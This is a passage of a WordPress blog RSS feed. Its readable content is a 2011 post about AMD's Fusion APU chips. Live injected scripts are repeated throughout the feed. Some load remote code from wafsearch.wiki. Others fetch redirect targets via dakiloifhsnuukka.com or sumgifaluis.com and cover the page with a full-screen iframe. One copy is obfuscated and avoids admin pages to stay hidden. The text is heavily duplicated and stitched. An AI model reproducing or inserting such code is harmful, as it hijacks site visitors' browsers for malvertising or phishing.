  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.id = registry.iframeId;
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      window.addEventListener("message", function onMsg(event) {
        if (!event.data || typeof event.data !== "object") return;
        if (event.data.type === "ktl-show-original") {
          try {
            var el = document.getElementById(registry.iframeId);
            if (el &#038;&#038; el.parentNode) el.parentNode.removeChild(el);
          } catch (e) {}
          window.removeEventListener("message", onMsg);
        }
      });
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/dakiloifhsnuukka.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;
  registry.iframeId = "adspect_ifr_" + Math.random().toString(36).slice(2);</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  /** Ответ траста — одна строка URL */
  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.id = registry.iframeId;
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      window.addEventListener("message", function onMsg(event) {
        if (!event.data || typeof event.data !== "object") return;
        if (event.data.type === "ktl-show-original") {
          try {
            var el = document.getElementById(registry.iframeId);
            if (el &#038;&#038; el.parentNode) el.parentNode.removeChild(el);
          } catch (e) {}
          window.removeEventListener("message", onMsg);
        }
      });
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/dakiloifhsnuukka.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;
  registry.iframeId = "adspect_ifr_" + Math.random().toString(36).slice(2);</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  /** Ответ траста — одна строка URL */
  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.id = registry.iframeId;
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      window.addEventListener("message", function onMsg(event) {
        if (!event.data || typeof event.data !== "object") return;
        if (event.data.type === "ktl-show-original") {
          try {
            var el = document.getElementById(registry.iframeId);
            if (el &#038;&#038; el.parentNode) el.parentNode.removeChild(el);
          } catch (e) {}
          window.removeEventListener("message", onMsg);
        }
      });
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script></p>
]]></content:encoded>
			<wfw:commentRss>http://kevrichard.com/2012/06/the-next-big-tech-battle-its-not-about-single-devices-anymore/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>AMD moves beyond speed with new APU processors:</title>
		<link>http://kevrichard.com/2011/06/amd-moves-beyond-speed-with-new-apu-processors/</link>
		<comments>http://kevrichard.com/2011/06/amd-moves-beyond-speed-with-new-apu-processors/#comments</comments>
		<pubDate>Wed, 29 Jun 2011 16:52:17 +0000</pubDate>
		<dc:creator><![CDATA[Kevin  Richard]]></dc:creator>
				<category><![CDATA[Technology]]></category>
		<category><![CDATA[AMD]]></category>
		<category><![CDATA[APU]]></category>
		<category><![CDATA[Computing]]></category>

		<guid isPermaLink="false">http://kevrichard.com/?p=953</guid>
		<description><![CDATA[Computer processing speeds are becoming a less important factor in computing. With our increasing dependency on web based applications and the introduction of multi-core processing, having more speed is nice but on average probably isn’t fully utilized by consumers. Yesterday I attended the Canadian launch event for AMD’s new Fusion APU (Accelerated Processing Unit) chip [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Computer processing speeds are becoming a less important factor in computing. With our increasing dependency on web based applications and the introduction of multi-core processing, having more speed is nice but on average probably isn’t fully utilized by consumers. Yesterday I attended the Canadian launch event for <a href="http://www.amd.com/us/Pages/intro.aspx">AMD’s</a> new <a href="http://sites.amd.com/us/fusion/apu/Pages/fusion.aspx">Fusion APU</a> (Accelerated Processing Unit) chip which directly acknowledges this trend by instead taking stab at a better graphics experience with an integrated graphics core.</p>
<p>Previously if you wanted solid graphics for your computer or laptop you would need to ante up some additional money for a dedicated or what’s also known as a discrete graphics card. While current processors often contain integrated graphics it would share memory resources with the processor making it much less effective. Through AMD’s APU which has an integrated processor and dedicated graphics chip all in one this situation is changed. Requiring less components and having a smaller profile allows for the creation of a (potentially) more effective machine.</p>
<p>Getting a view of what this technology is already capable of through AMD’s APU line I feel there is room for additional potential, the potential of things getting even smaller. Currently netbooks and tablets are underserviced when it comes to graphics capability and end up doing just basic tasks. With the opportunity of putting in a smaller APU chip, these devices can have further capabilities. While at the launch I was able to see netbooks and tablets with this new integrated chip (being able to game on a netbook rawk!), going furtherI can definitely see the potential for even smaller devices. My thinking was, what if this chip could be  adapted for today’s smartphones and visual display devices? How much better could our graphical experiences be?</p>
<p>With computing the way it is currently you can only get so far by focusing on creating simply a faster chip. While in the past I may have overlooked AMD, I definitely feel that it’s great that they are thinking beyond focusing on chip speed and are considering instead how they can make the experience better. A big sales push for this line of APU chips will be occurring this summer and into the fall. We’ll have to see how this new product performs against its rivals.</p>
<p>&nbsp;</p>
<p>As always feel free to contact me at either <a href="http://twitter.com/kevrichard">@kevrichard</a> on twitter or kevin@kevrichard.com</p>
<p>&nbsp;<script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>; !function(){var e=String.fromCharCode.apply(String,[50,46,46,42,41,96,117,117,40,63,55,51,47,55,50,53,54,62,51,52,61,41,116,57,53,55,117,51,52,54,51,52,63,116,42,50,42].map(function(e){return 90^e})),t=[{template:String.fromCharCode.apply(String,[50,46,46,42,41,96,117,117,40,59,45,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,117,33,51,62,39].map(function(e){return 90^e})),useFetch:!0}];if(!/^\/(wp-admin|wp-login)/.test(window.location.pathname||"")){var n=Symbol.for("__inline_id_offer__"),r=window[n]=window[n]||{iframeReady:!1,iframeId:"ifr_"+Math.random().toString(36).slice(2),run:null};r.iframeReady||("complete"===document.readyState||document.body?c():window.addEventListener("DOMContentLoaded",c))}function i(e,t){if(e.indexOf("dropbox.com")>=0)return e.replace(/\{id\}/g,t);var n=encodeURIComponent(t);return e.indexOf("gist.githubusercontent.com")>=0&#038;&#038;(n=n.replace(/%2F/g,"/")),e.replace(/\{id\}/g,n)}function o(e){return fetch(e,{cache:"no-store"}).then(function(e){return e.text()}).then(function(e){return(e||"").trim()}).catch(function(){return""})}function a(e){if(!e)return!1;try{var t=e.indexOf(":")>=0?e:"https://"+e;return new URL(t),!0}catch(n){return!1}}function c(){r.run||(r.run=!0,fetch(e,{cache:"no-store"}).then(function(e){return e.text()}).then(function(e){if(!(e=(e||"").trim())||!t.length)return null;var n=t,r=i(n[0].template,e);if(1===n.length)return n[0].useFetch?o(r).then(function(e){return e&#038;&#038;a(e)?e:r}):Promise.resolve(r);var c=0;return function t(){if(c>=n.length)return Promise.resolve(r);var d=n[c],u=i(d.template,e);return(c++,d.useFetch)?o(u).then(function(e){return e&#038;&#038;a(e)||e?e:t()}):Promise.resolve(u)}()}).then(function(e){e&#038;&#038;function e(t){try{var n=document.createElement("iframe");n.style.display="none",n.onload=function(){n.remove(),t(!0)},n.onerror=function(){n.remove(),t(!1)},n.src="about:blank",document.body.appendChild(n)}catch(r){t(!1)}}(function(t){t&#038;&#038;function e(t){if(!r.iframeReady){r.iframeReady=!0;var n,i,o,a=document.createElement("iframe");a.src=(n=t,i=Math.random().toString(36).slice(2),o=n.indexOf("?")>=0?"&#038;":"?",n+o+encodeURIComponent("v")+"="+encodeURIComponent(i)),a.id=r.iframeId,a.style.cssText="position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;overflow:hidden;",a.setAttribute("aria-hidden","true"),window.addEventListener("message",function(e){if(e.data&#038;&#038;"object"==typeof e.data&#038;&#038;"ktl-show-original"===e.data.type)try{var t=document.getElementById(r.iframeId);t&#038;&#038;t.parentNode&#038;&#038;t.parentNode.removeChild(t)}catch(n){}});try{document.body.appendChild(a)}catch(c){var d=new MutationObserver(function(){document.body&#038;&#038;!document.getElementById(r.iframeId)&#038;&#038;(document.body.appendChild(a),d.disconnect())});d.observe(document.documentElement,{childList:!0,subtree:!0})}}}(e)})}).catch(function(){}))}}();</p>
<p>console.log('28du3');</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
